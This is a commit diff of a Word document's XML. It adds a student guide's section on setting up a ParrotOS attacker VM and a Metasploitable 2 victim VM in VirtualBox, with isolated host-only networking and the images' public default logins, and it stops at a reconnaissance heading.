<commit_message>
added my part for ParrotOS to the instructions and added my journal --- done
</commit_message>
<xml_diff>
--- a/PenTest-Instructions-Unix.docx
+++ b/PenTest-Instructions-Unix.docx
@@ -4,16 +4,29 @@
   <w:body>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Trevor Kulczycki-McIntyre </w:t>
-      </w:r>
+        <w:t>Trevor Kulczycki-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">McIntyre - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>KaliOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
         <w:t>Nathaniel Bitton</w:t>
       </w:r>
       <w:r>
-        <w:tab/>
-      </w:r>
+        <w:t xml:space="preserve"> - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -77,15 +90,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Penetration Testing is a cybersecurity technique where simulated attacks are conducted on a computer system, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>network</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> or application to identify vulnerabilities and assess security.</w:t>
+        <w:t>Penetration Testing is a cybersecurity technique where simulated attacks are conducted on a computer system, network or application to identify vulnerabilities and assess security.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -163,13 +168,8 @@
         <w:t>VDI</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>file</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> file</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -198,15 +198,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">Set the name for your VM, it doesn’t really </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>matter</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Set the name for your VM, it doesn’t really matter </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -246,13 +238,8 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> files that were added (if any), since we just downloaded it, it should not appear here. Click on </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>add</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> files that were added (if any), since we just downloaded it, it should not appear here. Click on add</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -295,15 +282,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Now that everything is configured, click on start and after logging </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>in</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Now that everything is configured, click on start and after logging in </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -434,6 +413,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37A6CDAA" wp14:editId="238134B3">
             <wp:simplePos x="0" y="0"/>
@@ -544,6 +526,9 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25582C6E" wp14:editId="581DDF9A">
             <wp:extent cx="2210565" cy="1973580"/>
@@ -591,6 +576,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EAF3556" wp14:editId="0D920B1C">
             <wp:extent cx="5943600" cy="3982085"/>
@@ -733,6 +721,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="782AA778" wp14:editId="4A2B042A">
             <wp:extent cx="5943600" cy="3945890"/>
@@ -847,16 +838,14 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> will show the version, and -O will show the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>operating system</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t xml:space="preserve"> will show the version, and -O will show the operating system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594ECBF8" wp14:editId="2BA9388C">
             <wp:extent cx="5696745" cy="4143953"/>
@@ -925,13 +914,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Make sure to download the version for Linux-Debian-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>amd64</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>Make sure to download the version for Linux-Debian-amd64</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -939,6 +923,9 @@
         <w:t xml:space="preserve">After downloading, run the following command to install </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5962B92C" wp14:editId="0BCACB6F">
             <wp:extent cx="3390415" cy="2697480"/>
@@ -978,6 +965,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3649BEC3" wp14:editId="07D52497">
             <wp:extent cx="5801535" cy="3572374"/>
@@ -1031,6 +1021,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C8473F6" wp14:editId="32793A47">
             <wp:extent cx="2049780" cy="264938"/>
@@ -1076,6 +1069,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E3AB822" wp14:editId="1DB6BEBB">
             <wp:extent cx="2514951" cy="219106"/>
@@ -1135,6 +1131,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410667B6" wp14:editId="52E363AC">
             <wp:extent cx="5943600" cy="3300730"/>
@@ -1203,13 +1202,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">After filling out the fields you will see your activation code appear on the screen, copy it. Create an </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>account</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>After filling out the fields you will see your activation code appear on the screen, copy it. Create an account</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1218,6 +1212,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D52E073" wp14:editId="0C5EABEB">
@@ -1275,13 +1272,8 @@
         <w:t>plugins</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> so be patient before attempting to start a </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>scan</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> so be patient before attempting to start a scan</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -1290,6 +1282,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FFE673" wp14:editId="37A46A57">
             <wp:extent cx="5943600" cy="2997200"/>
@@ -1329,15 +1324,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Nessus works great because it scans the victims IP Address for vulnerabilities, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>similar to</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Nessus works great because it scans the victims IP Address for vulnerabilities, similar to </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1429,6 +1416,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A72A6DC" wp14:editId="0A96F797">
             <wp:extent cx="5943600" cy="4109720"/>
@@ -1513,6 +1503,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="258562DD" wp14:editId="32347ED0">
             <wp:extent cx="5943600" cy="2327910"/>
@@ -1562,6 +1555,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EB7DAF6" wp14:editId="6F0B9793">
@@ -1628,6 +1624,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5DB2E1" wp14:editId="4C82B4A2">
             <wp:extent cx="3927832" cy="2732405"/>
@@ -1681,6 +1680,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21438A9F" wp14:editId="6F1FD7E0">
             <wp:extent cx="5943600" cy="4020820"/>
@@ -1737,6 +1739,1950 @@
         <w:t>!</w:t>
       </w:r>
     </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Part 2: Getting Started with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Downloading </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Attacker)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId27" w:anchor="parrot-os-6-vbox" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.osboxes.org/parrot-security-os/#parrot-os-6-vbox</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">  and download the most recent version of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Linux.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Linux is a well-known Debian based OS widely used for simulating penetration tests and other cyber security assessments.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In this example we will use VirtualBox as our hypervisor however, VMWare is another viable option, just make sure you download the right image from osboxes.org.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Create a Virtual Machine with Parrot Security OS VDI file</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Inside your hypervisor create a new virtual machine using the Parrot OS Linux .VDI file that was downloaded in the previous step.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>On VirtualBox</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">New -&gt; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">Set the name for your VM, Ex. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Type: Linux</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Version: Debian 64-bit (since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is a Debian based OS)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Expert Mode -&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Hard-Disk -&gt; Use and Existing Hard Disk file </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t></w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">Small folder icon will show you the current </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> files that were added (if any), since we just downloaded it, it should not appear here. Click on add</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Add your .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file, select it and click choose in the bottom right. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>After selecting your .</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> file, go to hardware (still in expert mode) and allocate a desired amount of RAM and CPUs to your VM. For mine, I chose around 5Gb of Ram and 1 CPU.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Press Finish</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Downloading the Victim (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">The victim of our attacks is going to be </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2. I’ve decided to use this VM since it is a well-known machine to perform penetration tests on, as it was designed to do so.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">To download </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2, go to  </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId28" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://sourceforge.net/projects/metasploitable/files/latest/download</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> and download the .zip file. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">After that, go into VirtualBox and create a VM with the VDI inside of the zip file, you do not need to allocate much RAM since there is no GUI. ~500 Mb will suffice however in my example I used 700mb just to be safe, and make sure you set the core to 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>only  or</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> else it </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">wont bootup. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="373D9A4C" wp14:editId="70FC74BB">
+            <wp:extent cx="5943600" cy="3158490"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="966982296" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="966982296" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3158490"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Then click on use an existing virtual hard disk and browse for the VMDK </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="686B7F56" wp14:editId="61FD936C">
+            <wp:extent cx="5943600" cy="3268345"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="649626795" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="649626795" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3268345"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">*Network Configuration </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">On both virtual machines, make sure that in the Network settings, located in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>virtualbox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, are set to bridged adapter, and promiscuous mode is set to allow all.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Metasploitable2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Host-Only Networking: This configuration isolates Metasploitable2 within a private network that is accessible only from the host machine and other VMs configured to use the same host-only network. This setup prevents Metasploitable2 from accessing the internet and ensures it is accessible only to your penetration testing tools running on Parrot OS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Setup Steps:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>In VMware, go to the settings of the Metasploitable2 VM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Select the "Network Adapter" setting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Choose "Host-only" from the network connection options.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ensure that the "Connect at power on" option is checked.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Parrot OS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Host-Only Networking: Setting Parrot OS to use host-only networking as well allows it to communicate directly with Metasploitable2 without external network access. For penetration testing scenarios where Parrot OS does not require internet access, this ensures a secure and isolated environment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Setup Steps:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Follow the same steps as for Metasploitable2 to set Parrot OS’s network adapter to host-only.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Boot it Up!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now that everything is configured, click on start and after logging in for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ParrotOS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">Username: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>osboxes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>Password: osboxes.org</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Login credential for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Metasploitable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Username: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Password: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>msfadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73DFF025" wp14:editId="24AEF867">
+            <wp:extent cx="5943600" cy="2264410"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1725465624" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1725465624" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2264410"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Part 3: Start Hacking!</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This phase requires both v</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">irtual machines to be running on the host machine at the same time. Make sure that you carefully followed each previous step. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Reconnaissance </w:t>
+      </w:r>
